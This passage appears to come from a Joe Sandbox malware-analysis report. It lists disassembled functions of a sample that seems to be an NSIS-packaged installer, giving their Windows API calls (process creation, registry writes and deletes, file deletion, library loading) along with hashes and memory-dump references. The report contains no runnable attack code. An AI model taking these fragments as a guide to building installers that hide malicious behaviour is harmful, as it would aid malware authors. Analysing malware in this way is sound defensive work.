                                                                                                          • GlobalFree.KERNEL32(?), ref: 004028E9
                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                                                                                            • Part of subcall function 00403027: GetTickCount.KERNEL32 ref: 00403091
                                                                                                            • Part of subcall function 00403027: GetTickCount.KERNEL32 ref: 00403138
                                                                                                            • Part of subcall function 00403027: MulDiv.KERNEL32(7FFFFFFF,?,?), ref: 00403161
                                                                                                            • Part of subcall function 00403027: wsprintfW.USER32 ref: 00403174
                                                                                                          • DeleteFileW.KERNEL32(?), ref: 00402928
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2634980867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2634946801.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635034926.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635057456.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635113538.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileGlobal$AllocCountFreeTick$AttributesCloseCreateDeleteHandlePointerwsprintf
                                                                                                          • String ID:
                                                                                                          • API String ID: 2082585436-0
                                                                                                          • Opcode ID: f09a1f9abd4752cb5b2d55da90d863fde1dab2faf049735581e37d10801ea25f
                                                                                                          • Instruction ID: f11faf613eabf70f6da5efab5544ef3b1f343b4f82166007b8c29dabf9a1b1c4
                                                                                                          • Opcode Fuzzy Hash: f09a1f9abd4752cb5b2d55da90d863fde1dab2faf049735581e37d10801ea25f
                                                                                                          • Instruction Fuzzy Hash: D0217C72800118BFCF116FA5CE4889E7EB9EF09324F24423AF554762E0C6795D81DB68
                                                                                                          APIs
                                                                                                          • CharNextW.USER32(0040A300,*?|<>/":,00000000,0043F000,76F93420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 0040634C
                                                                                                          • CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
                                                                                                          • CharNextW.USER32(0040A300,0043F000,76F93420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 00406360
                                                                                                          • CharPrevW.USER32(0040A300,0040A300,76F93420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 00406373
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2634980867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2634946801.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635034926.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635057456.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635113538.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Char$Next$Prev
                                                                                                          • String ID: *?|<>/":
                                                                                                          • API String ID: 589700163-165019052
                                                                                                          • Opcode ID: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
                                                                                                          • Instruction ID: f5504631107e1e3793a073f133b65ff293a0897d7111eb10bd5d41781883406d
                                                                                                          • Opcode Fuzzy Hash: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
                                                                                                          • Instruction Fuzzy Hash: B611C42690061295DB303B558C84AB762F8EF54750F56843FED86B32D0EB7C9CA2C6ED
                                                                                                          APIs
                                                                                                          • lstrcatW.KERNEL32(00000000,00000000,0040A5F0,00440000,?,?,00000031), ref: 004017A8
                                                                                                          • CompareFileTime.KERNEL32(-00000014,?,0040A5F0,0040A5F0,00000000,00000000,0040A5F0,00440000,?,?,00000031), ref: 004017CD
                                                                                                            • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,?,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                            • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,?,76F923A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                            • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,?,76F923A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                            • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,?,76F923A0), ref: 0040520F
                                                                                                            • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                            • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                            • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                            • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2634980867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2634946801.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635034926.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635057456.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635113538.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                          • String ID:
                                                                                                          • API String ID: 1941528284-0
                                                                                                          • Opcode ID: 76a6acc1869b1502df51b2d70689f923f1781407bbca0b7b9e67ba73967ab9b8
                                                                                                          • Instruction ID: 02e4f6238df89927c362e8fae2a75ca1a565c16d749b69ec27d3a85cbadddcd8
                                                                                                          • Opcode Fuzzy Hash: 76a6acc1869b1502df51b2d70689f923f1781407bbca0b7b9e67ba73967ab9b8
                                                                                                          • Instruction Fuzzy Hash: 0941B631900515BACF11BFB5CC45EAF7679EF05328B24423BF522B10E1DB3C86519A6D
                                                                                                          APIs
                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402C20
                                                                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2634980867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2634946801.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635034926.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635057456.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635113538.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Close$DeleteEnumOpen
                                                                                                          • String ID:
                                                                                                          • API String ID: 1912718029-0
                                                                                                          • Opcode ID: 9537b7928c54e317f26638c763091e9991b3818ca9768273474462c6ff6c3974
                                                                                                          • Instruction ID: 923876515d334741f157c0c1a16b9ae25b0374e488e2a62f99a19aca1c1d50f8
                                                                                                          • Opcode Fuzzy Hash: 9537b7928c54e317f26638c763091e9991b3818ca9768273474462c6ff6c3974
                                                                                                          • Instruction Fuzzy Hash: 4B116A71504119BFEF10AF90DF8CEAE7B79FB54384B10003AF905A11A0D7B49E55AA28
                                                                                                          APIs
                                                                                                          • GetDlgItem.USER32(?,?), ref: 00401D00
                                                                                                          • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                                                                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                                                                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                                                                          • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2634980867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2634946801.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635034926.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635057456.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635113538.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 1849352358-0
                                                                                                          • Opcode ID: 7c596801b8e97744870de8fa040c6d0eb9a7113b3dcb71ab6f8aec32acf4c673
                                                                                                          • Instruction ID: e4f3909cb7298d305a77c10ae8325f91f27f48586481a57425ae6c27891e8aa9
                                                                                                          • Opcode Fuzzy Hash: 7c596801b8e97744870de8fa040c6d0eb9a7113b3dcb71ab6f8aec32acf4c673
                                                                                                          • Instruction Fuzzy Hash: 8AF0F472600504AFDB01DBE4DE88CEEBBBDEB48311B104476F501F51A1CA74DD018B38
                                                                                                          APIs
                                                                                                          • GetDC.USER32(?), ref: 00401D59
                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                                                                                                          • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 00401D86
                                                                                                          • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401DD1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2634980867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2634946801.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635034926.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635057456.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635113538.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                          • String ID:
                                                                                                          • API String ID: 3808545654-0
                                                                                                          • Opcode ID: f8a4d83ee30cd42d14a6a9659d47529e4ebc45f269bacdb6346c82beb54ce81b
                                                                                                          • Instruction ID: 434465042c296b11fe85f1af20959402fdd5081aa20827676714b0861cca44ca
                                                                                                          • Opcode Fuzzy Hash: f8a4d83ee30cd42d14a6a9659d47529e4ebc45f269bacdb6346c82beb54ce81b
                                                                                                          • Instruction Fuzzy Hash: C301A231544640EFE7015BB0EF8AB9A3F74AB66301F208579E581B62E2C9B800559BAE
                                                                                                          APIs
                                                                                                          • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
                                                                                                          • wsprintfW.USER32 ref: 00404A1A
                                                                                                          • SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2634980867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2634946801.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635034926.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635057456.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635113538.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ItemTextlstrlenwsprintf
                                                                                                          • String ID: %u.%u%s%s
                                                                                                          • API String ID: 3540041739-3551169577
                                                                                                          • Opcode ID: c2e87f168d66866e2d8dc5e8e8377fdf310bf379f9e84288a58d834ab05b21ed
                                                                                                          • Instruction ID: def2e14d0b5e9bf745060eb8ff4f21dbd1799345f736686a8e00f38c04d15d9e
                                                                                                          • Opcode Fuzzy Hash: c2e87f168d66866e2d8dc5e8e8377fdf310bf379f9e84288a58d834ab05b21ed
                                                                                                          • Instruction Fuzzy Hash: 3811EBB3A441287BDB10957D9C46EAF329C9B85374F250237FA65F31D1D978CC2182E8
                                                                                                          APIs
                                                                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                                                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2634980867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2634946801.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635034926.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635057456.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635113538.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Timeout
                                                                                                          • String ID: !
                                                                                                          • API String ID: 1777923405-2657877971
                                                                                                          • Opcode ID: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
                                                                                                          • Instruction ID: e3aefc4fd96fc6be6e01b9b250019d2d880820bae5141952ee5ed295407643d5
                                                                                                          • Opcode Fuzzy Hash: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
                                                                                                          • Instruction Fuzzy Hash: DA219071940209BEEF01AFB4CE4AABE7B75EB44344F10403EF601B61D1D6B89A409B68
                                                                                                          APIs
                                                                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D6
                                                                                                          • wsprintfW.USER32 ref: 00406411
                                                                                                          • LoadLibraryW.KERNEL32(?), ref: 00406421
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2634980867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2634946801.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635034926.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635057456.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635113538.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                          • String ID: %s%S.dll
                                                                                                          • API String ID: 2200240437-2744773210
                                                                                                          • Opcode ID: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
                                                                                                          • Instruction ID: 897e15d25a7328917349fb3201836a7725472686ce540cc24b04093dc9f4d60a
                                                                                                          • Opcode Fuzzy Hash: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
                                                                                                          • Instruction Fuzzy Hash: 81F0BB7051011997DB14AB68EE4DE9B366CEB00305F11447E9946F20D1EB7CDA69CBE8
                                                                                                          APIs
                                                                                                          • RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                                                                                          • lstrlenW.KERNEL32(0040B5F0,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                                                                                          • RegSetValueExW.ADVAPI32(?,?,?,?,0040B5F0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,0040B5F0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2634980867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2634946801.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635034926.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635057456.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635113538.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseCreateValuelstrlen
                                                                                                          • String ID:
                                                                                                          • API String ID: 1356686001-0
                                                                                                          • Opcode ID: 8a072e14775335605bdd4e78a6bff533e78b893741e3763667742a47c04b4826
                                                                                                          • Instruction ID: e0a93677b1043ce4e8fea40acd1fa81b7363c56b112b112c42ce1ea238d19e9d
                                                                                                          • Opcode Fuzzy Hash: 8a072e14775335605bdd4e78a6bff533e78b893741e3763667742a47c04b4826
                                                                                                          • Instruction Fuzzy Hash: 87118E71A00108BFEB10AFA5DE89EAEB67DEB44358F11403AF904B61D1D7B85E409668
                                                                                                          APIs
                                                                                                            • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,?,76F923A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                            • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,?,76F923A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                            • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,?,76F923A0), ref: 0040520F
                                                                                                            • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                            • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                            • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                            • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                            • Part of subcall function 00405735: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
                                                                                                            • Part of subcall function 00405735: CloseHandle.KERNEL32(0040A300), ref: 0040576B
                                                                                                          • WaitForSingleObject.KERNEL32(00000000,?,00000000,000000EB,00000000), ref: 00401E95
                                                                                                          • WaitForSingleObject.KERNEL32(?,?,0000000F), ref: 00401EAA
                                                                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                                                                                                          • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2634980867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2634946801.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635034926.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635057456.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635113538.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                          • String ID:
                                                                                                          • API String ID: 3585118688-0
                                                                                                          • Opcode ID: 2fccfab20e6c6224511eae8da94d64daaac4a5ffd49f94ff9cc0495680f83f6b
                                                                                                          • Instruction ID: 13991b0c54685da06ec2ee4a2e862f8a6615163aea1ca29b4ebe34551147a3b8
                                                                                                          • Opcode Fuzzy Hash: 2fccfab20e6c6224511eae8da94d64daaac4a5ffd49f94ff9cc0495680f83f6b
                                                                                                          • Instruction Fuzzy Hash: DE116131900508EBCF21AFA1CD459AE7BB6EF44354F24403BF901BA1E1D7798A919B9D
                                                                                                          APIs
                                                                                                          • CreateDirectoryW.KERNEL32(?,0040A300,00441800), ref: 004056C6
                                                                                                          • GetLastError.KERNEL32 ref: 004056DA
                                                                                                          • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056EF
                                                                                                          • GetLastError.KERNEL32 ref: 004056F9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2634980867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2634946801.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635034926.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635057456.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635113538.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                          • String ID:
                                                                                                          • API String ID: 3449924974-0
                                                                                                          • Opcode ID: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
                                                                                                          • Instruction ID: b9d54522e8c2a6a11acfe34e4faeeda892d25e5cd719c7a25251d408d6c76708
                                                                                                          • Opcode Fuzzy Hash: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
                                                                                                          • Instruction Fuzzy Hash: C8011A71D00619DBDF009FA0CA487EFBBB8EF14315F50443AD549B6190E7799604CFA9
                                                                                                          APIs
                                                                                                          • DestroyWindow.USER32(?,00000000,00402F6A,00000001,?,?,00000000,0040353A,?), ref: 00402D9D
                                                                                                          • GetTickCount.KERNEL32 ref: 00402DBB
                                                                                                          • CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
                                                                                                          • ShowWindow.USER32(00000000,00000005,?,?,00000000,0040353A,?), ref: 00402DE6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2634980867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2634946801.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635034926.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635057456.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635113538.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                          • String ID:
                                                                                                          • API String ID: 2102729457-0
                                                                                                          • Opcode ID: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
                                                                                                          • Instruction ID: 14797c98da9828bb931948049190d252b5e763d0d3dd0a8fb7bf7e32741345ac
                                                                                                          • Opcode Fuzzy Hash: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
                                                                                                          • Instruction Fuzzy Hash: C9F05430611A20BFC6716B50FF4D98B7B64BB84B11701457AF142B15E8CBB80C418B9C
                                                                                                          APIs
                                                                                                          • IsWindowVisible.USER32(?), ref: 00405157
                                                                                                          • CallWindowProcW.USER32(?,?,?,?), ref: 004051A8
                                                                                                            • Part of subcall function 00404165: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404177
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2634980867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2634946801.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635034926.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635057456.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635113538.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                                                          • String ID:
                                                                                                          • API String ID: 3748168415-3916222277
                                                                                                          • Opcode ID: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
                                                                                                          • Instruction ID: 0347cf6c5ba133ca8876b90c0990050b6d60b288702db1d6ba02f1018bbb4e5f
                                                                                                          • Opcode Fuzzy Hash: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
                                                                                                          • Instruction Fuzzy Hash: 4C017C71A00609ABDF214F51DD80FAB3B26EB84754F104036FA047E1E1C77A8C92DE69
                                                                                                          APIs
                                                                                                          • GetTickCount.KERNEL32 ref: 00405C77
                                                                                                          • GetTempFileNameW.KERNEL32(0040A300,?,00000000,?,?,?,00000000,0040329E,00441000,00441800,00441800,00441800,00441800,00441800,00441800,004034CC), ref: 00405C92
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2634980867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2634946801.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635034926.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635057456.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635113538.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CountFileNameTempTick
                                                                                                          • String ID: nsa
                                                                                                          • API String ID: 1716503409-2209301699
                                                                                                          • Opcode ID: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
                                                                                                          • Instruction ID: f587d7e23cd8e79aba5dfcc9fd1c49406dd64d8aef4a88ed345cfe548f7336ea
                                                                                                          • Opcode Fuzzy Hash: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
                                                                                                          • Instruction Fuzzy Hash: BAF06D76A00708BFEB008B59ED05A9FBBA8EB91750F10403AE900F7180E6B49A548B68
                                                                                                          APIs
                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
                                                                                                          • CloseHandle.KERNEL32(0040A300), ref: 0040576B
                                                                                                          Strings
                                                                                                          • Error launching installer, xrefs: 00405748
